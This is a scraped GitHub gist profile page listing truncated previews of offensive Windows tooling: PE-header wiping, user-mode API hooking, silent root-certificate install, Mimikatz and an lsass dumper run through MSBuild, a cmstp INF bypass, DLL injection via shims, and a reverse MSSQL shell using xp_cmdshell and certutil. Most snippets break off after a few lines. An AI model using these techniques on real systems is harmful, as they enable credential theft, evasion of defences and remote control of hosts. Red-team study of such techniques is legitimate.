Skip to content

Instantly share code, notes, and snippets.

View jackson5sec's full-sized avatar

jackson5 jackson5sec

View GitHub Profile
#include "stdafx.h"
#include <Windows.h>
#include <iostream>
void WipePEHeader(HANDLE GetModuleBase)
{
PIMAGE_DOS_HEADER pDosHeader = (PIMAGE_DOS_HEADER)GetModuleBase;
PIMAGE_NT_HEADERS pNTHeader = (PIMAGE_NT_HEADERS)((PBYTE)pDosHeader + (DWORD)pDosHeader->e_lfanew);
printf("NT Header at : %p\n", pNTHeader);
@jackson5sec
jackson5sec / Injectable.cpp
Created December 19, 2017 01:47 — forked from anonymous/Injectable.cpp
Simple UserMode Hook Example
#include <windows.h>
#include <stdio.h>
FARPROC fpCreateProcessW;
BYTE bSavedByte;
// Blog Post Here:
// https://0x00sec.org/t/user-mode-rootkits-iat-and-inline-hooking/1108
// tasklist | findstr explore.exe
@jackson5sec
jackson5sec / script.ps1
Created January 24, 2018 06:26
Hooking MessageBox For No-Prompt Trusted Root Certificate Install
#Verify Not Present
( Get-ChildItem Cert:\CurrentUser\Root | Where-Object {$_.Subject -match "__Interceptor_Trusted_Root" })
#Import-Certificate
( Get-ChildItem -Path C:\Test\thing.cer ) | Import-Certificate -CertStoreLocation cert:\CurrentUser\Root
#Prompted
Remove-Item -Path cert:\CurrentUser\Root\5C205339AE9FA846FA99D3FFF0CDEE65EB8D8E99
@jackson5sec
jackson5sec / Katz.Proj
Created February 3, 2018 23:50
Mimikatz In MSbuild
This file has been truncated, but you can view the full file.
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!-- This inline task executes mimikatz. -->
<!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe SimpleTasks.csproj -->
<!-- Save This File And Execute The Above Command -->
<!-- Author: Casey Smith, Twitter: @subTee -->
<!-- License: BSD 3-Clause -->
<Target Name="Hello">
<ClassExample />
</Target>
<UsingTask
#!/bin/bash
#set persistence mode for all GPU
sudo nvidia-smi -pm 1
#Set gpu max power at 160w
sudo nvidia-smi -pl 160
#Set Power level of specific GPU (1080) in watts
# sudo nvidia-smi -i 2 -pl 200
;cmstp.exe /s cmstp.inf
[version]
Signature=$chicago$
AdvancedINF=2.5
[DefaultInstall_SingleUser]
UnRegisterOCXs=UnRegisterOCXSection
[UnRegisterOCXSection]
@jackson5sec
jackson5sec / gist:9048d605616ab1551c620b18638a2d26
Created February 13, 2018 19:29 — forked from daicham/gist:4528511
zip/unzip on Powershell (depends on Ionic.Zip.dll)
function zip ($zipFilePath, $targetDir) {
# load Ionic.Zip.dll
[System.Reflection.Assembly]::LoadFrom(path\to\Ionic.Zip.dll)
$encoding = [System.Text.Encoding]::GetEncoding("shift_jis") # 日本語のファイルを扱うために必要
$zipfile = new-object Ionic.Zip.ZipFile($encoding)
$zipfile.AddDirectory($targetDir)
if (!(test-path (split-path $zipFilePath -parent))) {
mkdir (split-path $zipFilePath -parent)
@jackson5sec
jackson5sec / dllinjshim.cpp
Created February 13, 2018 19:52 — forked from w4kfu/dllinjshim.cpp
DLL Injection via Shim
/*
-------- dllinjshim.cpp --------
> cl /Fe:dllinjshim.exe dllinjshim.cpp
> dllinjshim.exe
> sdbinst moo.sdb
------------------------------------
@jackson5sec
jackson5sec / MSBuildProcDumper.csproj
Created February 22, 2018 22:15
MSBuild - Process Dumper - lsass example
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!-- This inline task executes c# code. -->
<!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe MSBuildProcDumper.csproj -->
<!-- Feel free to use a more aggressive class for testing. -->
<Target Name="Hello">
<ClassExample />
</Target>
<UsingTask
TaskName="ClassExample"
TaskFactory="CodeTaskFactory"
@jackson5sec
jackson5sec / mandros.py
Created March 20, 2018 16:38 — forked from xassiz/mandros.py
Reverse MSSQL shell
import sys
import requests
import threading
import HTMLParser
from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler
'''
Description: Reverse MSSQL shell through xp_cmdshell + certutil for exfiltration
Author: @xassiz
'''